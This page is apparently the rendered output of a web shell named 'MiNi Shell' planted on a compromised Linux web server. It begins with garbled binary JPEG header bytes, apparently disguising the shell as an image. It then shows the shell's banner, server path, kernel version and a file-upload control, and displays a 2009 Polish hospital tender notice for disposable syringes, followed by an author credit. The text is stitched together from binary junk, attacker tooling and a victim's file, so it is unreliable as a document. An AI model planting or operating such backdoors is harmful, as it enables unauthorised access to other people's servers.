JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090506/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090506/134696-N-2009.html

<p class="kh_header"><b>Poznań: Przedmiotem  zamówienia  jest   dostawa   wyrobów medycznych: strzykawek</b><br>
<b>Numer ogłoszenia: 134696 - 2009; data zamieszczenia: 06.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ginekologiczno-Położniczy Szpital Kliniczny Uniwersytetu Medycznego im. Karola Marcinkowskiego w Poznaniu , ul. Polna 33, 60-535 Poznań, woj. wielkopolskie, tel. 061 8419294, faks 061 8419620.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gpsk.am.poznan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem  zamówienia  jest   dostawa   wyrobów medycznych: strzykawek.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia  jest   dostawa   wyrobów medycznych: strzykawek z podziałem na 10  n/w części:
	       Część nr  1- strzykawki Luer 2-częściowe bez igły, jałowe jednorazowego użycia
                     Część nr  2- strzykawki luer 3-częściowe z igłą, jałowe jednorazowego użycia
                     Część nr  3- strzykawki LuerLock  3-częściowe bez igły, jałowe jednorazowego użycia
                     Część nr  4 - strzykawki tuberkulinowe Luer 3-częściowe 1 ml z igłą, jałowe jednorazowego użycia
                     Część nr  5- strzykawki Luer Lock 3-częściowe bez igły, jałowe jednorazowego użycia
                     Część nr  6- Strzykawki Luer 3-częściowe bez igły, jałowe jednorazowego użytku, do podawania  	małych       
                                         dawek
                     Część nr  7 - strzykawki Luer 3-częściowe bez igły, jałowe jednorazowego użytku, do podawania 	bardzo   
                                           małych dawek
                     Część nr  8 - strzykawki do podawania insuliny z igłą Luer 3-częściowe jałowe jednorazowego 	użycia
                     Część nr  9 - strzykawka z końcówką do cewników 100 ml, jałowa jednorazowego użycia
                     Część nr 10 - strzykawki tuberkulinowe Luer 3-częściowe 1 ml z igłą, jałowe jednorazowego użycia.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający  z  uwzględnieniem  przepisu  art.  45  ust. 1  nie   wymaga  wniesienia  wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O   udzielenie  zamówienia  mogą  ubiegać się Wykonawcy,  którzy;
1)	posiadają  uprawnienia  do  wykonywania  określonej  działalności  lub  czynności,  jeżeli  ustawy  nakładają  obowiązek  posiadania  takich  uprawnień;
2)	posiadają  niezbędną  wiedzę  i  doświadczenie  oraz  dysponują  potencjałem  technicznym  
i  osobami  zdolnymi  do  wykonania  zamówienia  lub  przedstawią  pisemne  zobowiązanie  innych  podmiotów  do  udostępnienia  potencjału  technicznego  i  osób  zdolnych  do  wykonania  zamówienia;
3)	znajdują  się  w  sytuacji  ekonomicznej  i  finansowej  zapewniającej  wykonanie  zamówienia;
4)	nie  podlegają  wykluczeniu  z  postępowania  o  udzielenie  zamówienia.

Ocena  spełniania  warunków dokonana  będzie  na  podstawie  dokumentów  i  oświadczeń  żądanych  w  pkt. 8  niniejszej  specyfikacji  i  przedstawionych  wraz   z  ofertą,  z  zastosowaniem  metody   spełnia / nie spełnia .  
	Wykonawca  nie  spełniający  któregokolwiek  z  warunku  zostaje  wykluczony  z  postępowania,  a  złożona  przez  niego  oferta  nie  będzie  rozpatrywana,  ponieważ  na  podstawie  art.  24  ust. 4  ustawy  uznaje  się  ją  za  odrzuconą.
Decyzję  dotyczącą  wykluczenia  Wykonawcy  z  postępowania  Zamawiający  podejmuje  z uwzględnieniem  obowiązków,  o  których  mowa  w  art.  26  ust. 3  ustawy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W  celu  potwierdzenia,  że  Wykonawca  posiada  uprawnienie  do  wykonywania  określonej  działalności  lub  czynności  oraz  nie  podlega  wykluczeniu  na  podstawie  art.  24  ustawy,  wraz  z  ofertą  należy  przedstawić;
1)	aktualny  odpis  z  właściwego  rejestru  lub  aktualne  zaświadczenie  o  wpisie  do  ewidencji  działalności  gospodarczej,  jeżeli  odrębne  przepisy  wymagają  wpisu  do  rejestru  lub  zgłoszenia  do  ewidencji  działalności  gospodarczej,  wystawiony  nie  wcześniej  niż  6  miesięcy  przed  upływem  terminu  składania  ofert,
2) Oświadczenie  o  spełnieniu  warunków  wskazanych  w  art.  22  ust. 1  ustawy  z  dnia  29  stycznia  2004 r. - Prawo  zamówień  publicznych  - załącznik  nr  5  do  specyfikacji
3) Oświadczenie,  że  Wykonawca  nie  podlega  wykluczeniu  z  postępowania  na  podstawie  art.  24  ustawy  -  załącznik  nr   6   do  specyfikacji.
Wykonawcy   mający  siedzibę  lub  miejsce   zamieszkania   poza   terytorium  Rzeczypospolitej   Polskiej   stosują  się  do  przepisów  §  2  Rozporządzenia  Prezesa  Rady  Ministrów  z  dnia  19  maja  2006 r. ( Dz. U.  Nr  87,  poz.  605 ) w  sprawie  rodzajów  dokumentów,  jakich  może  żądać  Zamawiający  od  Wykonawcy,  oraz  form,  w  jakich  te  dokumenty  mogą  być  składane oraz  Rozporządzenia  Prezesa  Rady  Ministrów  z  dnia  16  października  2008 r.  (  Dz. U.  Nr  188,  poz. 1155)  zmieniającego  rozporządzenie  w  sprawie  rodzajów  dokumentów,  jakich  może  żądać  Zamawiający  od  Wykonawcy,  oraz  form,  w  jakich  te  dokumenty  mogą  być  składane.  
Zamawiający  dopuszcza  możliwość  złożenia  oferty  przez  dwóch  lub  więcej  Wykonawców  (  w  ramach  oferty  wspólnej )  w  rozumieniu  art.  23  ustawy,  pod  warunkiem,  że  taka  oferta   spełniać będzie  następujące  wymagania;
1)	Wykonawcy  są  zobowiązani  ustanowić  Wykonawcę  -  Pełnomocnika  do  reprezentowania  ich  w  postępowaniu  o  udzielenie  zamówienia  albo  do  reprezentowania  ich  w  postępowaniu  i  zawarcia  umowy  stosownie  do  art.  23,  ust. 2  ustawy  -  Prawo  zamówień  publicznych.
2)	Dokument  pełnomocnictwa  musi  być  załączony  do  oferty  i  zawierać  w  szczególności  wskazanie:  postępowania  o  zamówienie  publiczne,  którego  dotyczy,  Wykonawców  ubiegających  się  wspólnie  o  udzielenie  zamówienia,  ustanowionego  Wykonawcę  -  Pełnomocnika  oraz  zakres  jego  umocowania.
3)	Dokument  pełnomocnictwa  musi  być  podpisany  w  imieniu  wszystkich  Wykonawców  ubiegających  się  wspólnie  o  udzielenie  zamówienia,  w  tym  Wykonawcę  ustanowionego  jako  Pełnomocnika  i  przez  osoby  uprawnione  do  składania  oświadczeń  woli  wymienione  we  właściwym  rejestrze  lub  ewidencji  Wykonawcy.
4)	Dokumenty  wymienione  w  punkcie  1), 2) ,3)    każdy  Wykonawca  składa  oddzielne.  
5)	Wykonawcy  wspólnie  ubiegający  się  o  udzielenie  zamówienia  ponoszą  solidarną  odpowiedzialność  za  wykonanie  umowy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.gpsk.am.poznan.pl/dzp.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> GPSK, ul. Polna 33, 60-535 Poznań, Dział Zamówień Publicznych.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.05.2009 godzina 09:00, miejsce: Pokój nr  317 - Kancelaria  Ogólna  mieszcząca  się  w  Budynku  Wielofunkcyjnym  Szpitala, wejście  D1  lub  drogą  pocztową  na  adres  zamawiającego.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 01 <b>NAZWA:</b> strzykawki Luer 2-częściowe bez igły, jałowe jednorazowego użycia.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> strzykawki Luer 2-częściowe bez igły, jałowe jednorazowego użycia - 913 600 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 02 <b>NAZWA:</b> strzykawki luer 3-częściowe z igłą, jałowe jednorazowego użycia.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> strzykawki luer 3-częściowe z igłą, jałowe jednorazowego użycia - 400 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 03 <b>NAZWA:</b> strzykawki LuerLock  3-częściowe bez igły, jałowe jednorazowego użycia.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> strzykawki LuerLock  3-częściowe bez igły, jałowe jednorazowego użycia - 113 000 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 04 <b>NAZWA:</b> strzykawki tuberkulinowe Luer 3-częściowe 1 ml z igłą, jałowe jednorazowego użycia.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> strzykawki tuberkulinowe Luer 3-częściowe 1 ml z igłą, jałowe jednorazowego użycia
- 20 000 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 05 <b>NAZWA:</b> strzykawki Luer Lock 3-częściowe bez igły, jałowe jednorazowego użycia.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> strzykawki Luer Lock 3-częściowe bez igły, jałowe jednorazowego użycia - 129 400 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 06 <b>NAZWA:</b> Strzykawki Luer 3-częściowe bez igły, jałowe jednorazowego użytku, do podawania bardzo małych dawek.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Strzykawki Luer 3-częściowe bez igły, jałowe jednorazowego użytku, do podawania bardzo małych dawek - 40 000 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 07 <b>NAZWA:</b> strzykawki Luer 3-częściowe bez igły, jałowe jednorazowego użytku, do podawania bardzo małych dawek.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> strzykawki Luer 3-częściowe bez igły, jałowe jednorazowego użytku, do podawania bardzo małych dawek - 4000 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 08 <b>NAZWA:</b> strzykawki do podawania insuliny z igłą Luer 3-częściowe jałowe jednorazowego użycia.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> strzykawki do podawania insuliny z igłą Luer 3-częściowe jałowe jednorazowego użycia - 1600 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 09 <b>NAZWA:</b> strzykawka z końcówką do cewników 100 ml, jałowa jednorazowego użycia.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> strzykawka z końcówką do cewników 100 ml, jałowa jednorazowego użycia - 1600 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> strzykawki tuberkulinowe Luer 3-częściowe 1 ml z igłą, jałowe jednorazowego użycia.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> strzykawki tuberkulinowe Luer 3-częściowe 1 ml z igłą, jałowe jednorazowego użycia - 20 000 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com